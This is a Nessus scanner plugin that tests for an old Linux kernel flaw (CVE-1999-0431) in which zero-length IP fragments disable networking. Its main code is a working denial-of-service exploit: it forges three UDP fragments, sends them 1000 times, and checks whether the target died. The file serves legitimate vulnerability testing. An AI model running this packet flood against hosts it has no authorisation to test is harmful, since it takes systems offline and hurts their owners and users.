#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10134);
 script_bugtraq_id(2247);
 script_version ("$Revision: 1.27 $");
 script_cve_id("CVE-1999-0431");
 script_xref(name:"OSVDB", value:"5941");
 name["english"] = "Linux 2.1.89 - 2.2.3 : 0 length fragment bug";
 script_name(english:name["english"]);
 
 desc["english"] = "
Synopsis :

The remote host is prone to a denial of service attack. 

Description :

The remote host appears to be using a Linux kernel that contains a
flaw in its IP fragment handling code.  By sending a series of packets
with 0 length fragments, an unauthenticated attack may be able to
disable the remote host's IP connectivity. 

See also :

http://archives.neohapsis.com/archives/bugtraq/1999_1/1079.html

Solution :

If the remote host is a Linux server, then install a newer kernel
(2.2.4).  If it is not, then contact your vendor for a patch. 

Risk factor : 

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P)";
 script_description(english:desc["english"]);
 
 summary["english"] = "Crashes the remote linux box";
 script_summary(english:summary["english"]);
 
 script_category(ACT_KILL_HOST);
 
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison");
 family["english"] = "Denial of Service";
 script_family(english:family["english"]);
 
 exit(0);
}

#
# The script code starts here
#


include('global_settings.inc');
if ( TARGET_IS_IPV6 ) exit(0);

if ( ! thorough_tests ) exit(0);

start_denial();

# source port
s = 56;
# dest port
d = 16384;

ip = forge_ip_packet(ip_v : 4,
                     ip_hl: 5,
                     ip_tos:0,
                     ip_id : 0x1234,
                     ip_ttl: 0x40,
                     ip_p  : IPPROTO_UDP,
                     ip_len:  20 + 32,
		     ip_src: this_host(),
                     ip_off: IP_MF);
udp1 = forge_udp_packet(ip:ip, uh_sport:s, uh_dport:d, uh_ulen:56);

ip = set_ip_elements(ip : ip, ip_len : 20, ip_off : IP_MF);
udp2 = forge_udp_packet(ip:ip, uh_sport:s,uh_dport:d, uh_ulen:56,
                        update_ip_len:FALSE);
ip = set_ip_elements(ip : ip, ip_len:32 + 20,ip_off:4);
udp3 = forge_udp_packet(ip:ip, uh_sport:s,uh_dport:d,uh_ulen:56);

# don't read the host answers
send_packet(udp1,udp2, udp3, pcap_active:FALSE) x 1000;

sleep(30);

alive = end_denial();

if(!alive){
                set_kb_item(name:"Host/dead", value:TRUE);
                security_warning(port:0, protocol:"udp");
                }
